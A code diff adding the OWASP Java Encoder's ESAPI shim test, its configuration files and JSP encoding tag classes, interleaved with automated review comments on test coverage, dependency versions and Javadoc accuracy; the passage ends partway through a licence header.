@@ -0,0 +1,33 @@ +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml new file mode 100644 index 0000000..743ef44 --- /dev/null +++ b/esapi/src/site/site.xml @@ -0,0 +1,41 @@ + + + + + + \ No newline at end of file diff --git a/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java new file mode 100644 index 0000000..7443996 --- /dev/null 
+++ b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java
@@ -0,0 +1,49 @@
+package org.owasp.encoder.esapi;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+import org.owasp.esapi.ESAPI;
+import org.owasp.esapi.Encoder;
+
+/**
+ * ESAPIEncoderTest
+ *
+ * @author jeffi
+ */
+public class ESAPIEncoderTest extends TestCase {
+ public static Test suite() {
+ return new TestSuite(ESAPIEncoderTest.class);
+ }
+
+ public void testEncode() throws Exception {
+ // Note: ESAPI reference encodes as: "<>&Ω"
+ // That's 25 characters to OWASP Java Encoder's 14.
+ assertEquals("<>&\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9"));
+ }
+
+ public void testSerialization() throws Exception {
+ // Note: ESAPI reference implementation is NOT serializable. Maybe
+ // it will be in the future. Our implementation is however
+ // guaranteed serializable.
+
+ Encoder encoder = ESAPI.encoder();
+
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(encoder);
+ oos.close();
+
+ ObjectInputStream ois = new ObjectInputStream(
+ new ByteArrayInputStream(baos.toByteArray()));
+
+ Encoder deserializedEncoder = (Encoder)ois.readObject();
+
+ assertSame(encoder, deserializedEncoder);
+ }
+}
diff --git a/esapi/src/test/resources/.esapi/ESAPI.properties b/esapi/src/test/resources/.esapi/ESAPI.properties
new file mode 100644
index 0000000..d1d5f41
--- /dev/null
+++ b/esapi/src/test/resources/.esapi/ESAPI.properties
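Review bot: `testEncode` exercises only `encodeForXML`, so none of the shim methods whose behaviour is most likely to differ from the reference encoder — `encodeForURL` in particular, and the null-input handling of the `Encode`-backed methods — has an assertion pinning what the shim returns. A case such as `assertEquals(EXPECTED_URL_ENCODING /* placeholder */, ESAPI.encoder().encodeForURL("a=b&c"))` would make the URL-encoding contract the shim promises explicit; as it stands a change in delegation would go unnoticed. In `testSerialization` the `ObjectInputStream` is never closed; harmless on a byte-array stream, but try-with-resources around both streams would be tidier if the module's source level allows it.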
@@ -0,0 +1,38 @@ +# Properties based on ESAPI 2.2.1.1's configuration/esapi/ESAPI.properties file. + +ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder + +# Log4JFactory Requires log4j.xml or log4j.properties in classpath - http://www.laliluna.de/log4j-tutorial.html +# Note that this is now considered deprecated! +#ESAPI.Logger=org.owasp.esapi.logging.log4j.Log4JLogFactory + +# To use JUL, you need to obtain ESAPI's esapi-java-logging.properties and drop +# it somewhere into your class path. You can get it from the ESAPI configuration +# jar. (See Release 2.2.1.1 under GitHub for ESAPI/esapi-java-legacy.) +ESAPI.Logger=org.owasp.esapi.logging.java.JavaLogFactory + +# To use the new SLF4J logger in ESAPI (see GitHub issue #129), set +#ESAPI.Logger=org.owasp.esapi.logging.slf4j.Slf4JLogFactory +# and do whatever other normal SLF4J configuration that you normally would do for your application. + +# Note: The uncommented out ones are those needed for SLF4J. Others may be +# needed if you change the ESAPI logger. +#=========================================================================== +# ESAPI Logging +# Set the application name if these logs are combined with other applications +Logger.ApplicationName=ESAPI-Shim-Test +# If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true +Logger.LogEncodingRequired=false +# Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments. +Logger.LogApplicationName=true +# Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments. +Logger.LogServerIP=false +# LogFileName, the name of the logging file. Provide a full directory path (e.g., C:\\ESAPI\\ESAPI_logging_file) if you +# want to place it in a specific directory. 
+#Logger.LogFileName=ESAPI_logging_file +# MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000) +#Logger.MaxLogFileSize=10000000 +# Determines whether ESAPI should log the user info. +Logger.UserInfo=false +# Determines whether ESAPI should log the session id and client IP +Logger.ClientInfo=false diff --git a/esapi/src/test/resources/esapi-java-logging.properties b/esapi/src/test/resources/esapi-java-logging.properties new file mode 100644 index 0000000..71011ac --- /dev/null +++ b/esapi/src/test/resources/esapi-java-logging.properties @@ -0,0 +1,6 @@ +handlers= java.util.logging.ConsoleHandler +.level= INFO +java.util.logging.ConsoleHandler.level = INFO +java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter +java.util.logging.SimpleFormatter.format=[%1$tF %1$tT] [%3$-7s] %5$s %n +#https://www.logicbig.com/tutorials/core-java-tutorial/logging/customizing-default-format.html \ No newline at end of file diff --git a/jsp/pom.xml b/jsp/pom.xml new file mode 100644 index 0000000..2b9024c --- /dev/null +++ b/jsp/pom.xml @@ -0,0 +1,93 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder-jsp + jar + + JSP Encoder + + The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow + easy use of the OWASP Encoder Project's core API. The TLDs contain both tag + definitions and JSP EL functions. + + + + org.owasp.encoder.jsp + + + + + org.owasp.encoder + encoder + ${project.parent.version} + + + javax.servlet.jsp + javax.servlet.jsp-api + 2.2.1 + provided + + + javax.servlet + javax.servlet-api + 3.0.1 + test + + + org.springframework + spring-test + 5.1.3.RELEASE + test + + + org.springframework + spring-core + 5.3.19 + test + + + diff --git a/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java new file mode 100644 index 0000000..ef9b482 --- /dev/null 
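Review bot: The jsp/pom.xml test dependencies put two Spring release lines on the same classpath — `spring-test 5.1.3.RELEASE` next to `spring-core 5.3.19` — and spring-test 5.1.x was built against its own 5.1.x spring-core, so the test classpath mixes minor versions that are not guaranteed to be binary-compatible. Aligning spring-test to `5.3.19`, the version already chosen for spring-core, avoids an inconsistent classpath; if 5.3.19 was picked to pull in a specific fix, spring-test should follow it rather than stay on the older line.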
+++ b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java 
@@ -0,0 +1,57 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import javax.servlet.jsp.tagext.SimpleTagSupport;
+
+/**
+ * The base class for the encoding tags within this package.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public abstract class EncodingTag extends SimpleTagSupport {
+ /**
+ * The value to be written out by the tag.
+ */
+ protected String _value;
+ /**
+ * Sets the value to be written out by the tag.
+ * @param value the value to be written out by the tag.
+ */
+ public void setValue(String value) {
+ this._value = value;
+ }
+
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java
new file mode 100644
index 0000000..23db285
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform encoding sufficient to place into a CDATA block.
+ * This wraps the {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCDATATag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCDATA(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java
new file mode 100644
index 0000000..e6edb5e
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java
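Review bot: The class Javadoc links the `String`-returning overload `Encode#forCDATA(java.lang.String)`, but `doTag` calls the streaming overload through `getJspContext().getOut()`, so the documented method is not the one actually wrapped; `{@link org.owasp.encoder.Encode#forCDATA(java.io.Writer, java.lang.String)}` is the accurate reference. The same mismatch appears in ForCssStringTag, ForCssUrlTag, ForHtmlAttributeTag, ForHtmlContentTag and ForHtmlTag in the following hunks. Each tag's Javadoc should also say what is emitted when the `value` attribute is omitted, since `_value` is then null and is handed straight to `Encode`; whether that produces the literal text "null" or an exception depends on `Encode`'s null handling, which is not visible here.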
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform CSS encoding for CSS strings.
+ * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssStringTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCssString(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java
new file mode 100644
index 0000000..673a975
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform CSS encoding for CSS URL contexts.
+ * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssUrlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forCssUrl(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java
new file mode 100644
index 0000000..866b933
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding for HTML text attributes.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java
new file mode 100644
index 0000000..9ebf3c7
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding for text content.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlContentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlContent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java
new file mode 100644
index 0000000..71c7d73
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtml(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java
new file mode 100644
index 0000000..5b895f9
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform HTML Attribute encoding for an unquoted attribute.
+ * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForHtmlUnquotedAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java
new file mode 100644
index 0000000..71ff6b6
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
